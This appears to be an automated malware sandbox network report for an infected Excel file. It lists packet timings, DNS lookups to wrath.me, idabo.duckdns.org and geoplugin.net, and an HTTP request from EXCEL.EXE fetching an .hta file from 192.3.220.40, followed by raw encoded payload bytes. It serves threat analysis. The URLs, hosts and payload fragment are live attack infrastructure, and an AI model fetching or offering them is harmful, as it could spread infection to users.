                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843208075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843219042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843231916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843257904 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843592882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843605042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843616009 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843640089 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843734026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843744993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843755960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843767881 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843782902 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843813896 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843980074 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843991995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844002008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844012976 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844023943 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844027042 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844034910 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844048977 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844049931 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844060898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844080925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844468117 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844480038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844490051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844501019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844511032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844522953 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844532013 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844532967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844543934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844553947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844562054 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844563961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844574928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844575882 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844598055 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844897032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844907999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844918013 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844923019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844929934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844934940 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844939947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844945908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844949961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844954967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844959974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844966888 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844970942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845007896 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845019102 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845344067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845355034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845365047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845375061 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852724075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852735043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852746010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852756977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852765083 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852767944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852778912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852782011 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852788925 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852792025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852799892 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852809906 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852819920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852824926 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852832079 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852849960 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.852996111 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853005886 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853018045 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853028059 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853049994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853056908 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853058100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853069067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853080034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853095055 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853099108 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853111982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853122950 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853130102 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853133917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853140116 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853151083 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853162050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853173971 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853183985 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853197098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853209972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853219032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853229046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853240013 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853240967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853251934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853255033 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853261948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853269100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853283882 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853295088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853460073 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853472948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853497028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853507996 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853514910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853519917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853530884 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853540897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853547096 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853571892 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853751898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853763103 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853773117 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853784084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853795052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853804111 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853806019 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853816032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853825092 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853827000 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853844881 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853863955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853868961 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853883028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853893995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853904009 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853913069 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853923082 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853924990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853934050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853945017 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853955030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853955984 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853966951 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853974104 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853981018 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853986025 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.853997946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854007006 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854032993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854032993 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854047060 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854084015 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854305029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854315996 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854326963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854336977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854350090 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854365110 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854381084 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.854449987 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945909977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945926905 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945946932 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.946116924 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:22.038700104 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.895447016 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.897069931 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.902031898 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.900110006 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.901714087 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.907239914 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:15.509218931 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:15.867515087 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:16.460315943 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:17.661674976 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:20.063935041 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:24.868743896 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:34.462809086 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.911397934 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.912936926 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.918004990 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.916706085 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.926261902 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.931376934 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.933068991 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.936193943 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.941732883 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.043407917 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.059015989 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.100918055 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.121041059 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.788644075 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.798891068 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.552449942 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.560094118 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.578180075 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.589601040 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.204745054 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.301563978 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.765734911 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.775629044 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.185038090 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.196192026 CEST53498818.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 15:23:39.043407917 CEST | 192.168.2.22 | 8.8.8.8 | 0x2966 | Standard query (0) | wrath.me | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:41.100918055 CEST | 192.168.2.22 | 8.8.8.8 | 0x9419 | Standard query (0) | wrath.me | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:54.788644075 CEST | 192.168.2.22 | 8.8.8.8 | 0xada6 | Standard query (0) | ia600102.us.archive.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.552449942 CEST | 192.168.2.22 | 8.8.8.8 | 0xd210 | Standard query (0) | wrath.me | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.578180075 CEST | 192.168.2.22 | 8.8.8.8 | 0xd210 | Standard query (0) | wrath.me | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:02.204745054 CEST | 192.168.2.22 | 8.8.8.8 | 0xd393 | Standard query (0) | idabo.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:03.765734911 CEST | 192.168.2.22 | 8.8.8.8 | 0x1ccd | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:15.185038090 CEST | 192.168.2.22 | 8.8.8.8 | 0xa5ff | Standard query (0) | ia600102.us.archive.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 15:23:39.059015989 CEST | 8.8.8.8 | 192.168.2.22 | 0x2966 | No error (0) | wrath.me | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:39.059015989 CEST | 8.8.8.8 | 192.168.2.22 | 0x2966 | No error (0) | wrath.me | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:41.121041059 CEST | 8.8.8.8 | 192.168.2.22 | 0x9419 | No error (0) | wrath.me | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:41.121041059 CEST | 8.8.8.8 | 192.168.2.22 | 0x9419 | No error (0) | wrath.me | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:54.798891068 CEST | 8.8.8.8 | 192.168.2.22 | 0xada6 | No error (0) | ia600102.us.archive.org | | 207.241.227.242 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.560094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xd210 | No error (0) | wrath.me | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.560094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xd210 | No error (0) | wrath.me | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.589601040 CEST | 8.8.8.8 | 192.168.2.22 | 0xd210 | No error (0) | wrath.me | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:59.589601040 CEST | 8.8.8.8 | 192.168.2.22 | 0xd210 | No error (0) | wrath.me | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:02.301563978 CEST | 8.8.8.8 | 192.168.2.22 | 0xd393 | No error (0) | idabo.duckdns.org | | 135.148.195.248 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:03.775629044 CEST | 8.8.8.8 | 192.168.2.22 | 0x1ccd | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:24:15.196192026 CEST | 8.8.8.8 | 192.168.2.22 | 0xa5ff | No error (0) | ia600102.us.archive.org | | 207.241.227.242 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                    • wrath.me
                                                                                                                                                                                                                    • ia600102.us.archive.org
                                                                                                                                                                                                                    • 192.3.220.40
                                                                                                                                                                                                                    • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | 3480 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:23:40.224842072 CEST | 351 | OUT | GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.220.40
Connection: Keep-Alive
Oct 8, 2024 15:23:40.699470997 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:23:40 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
ETag: "1d7e1-623f1fc7dcdfc"
Accept-Ranges: bytes
Content-Length: 120801
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699678898 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699696064 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699812889 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
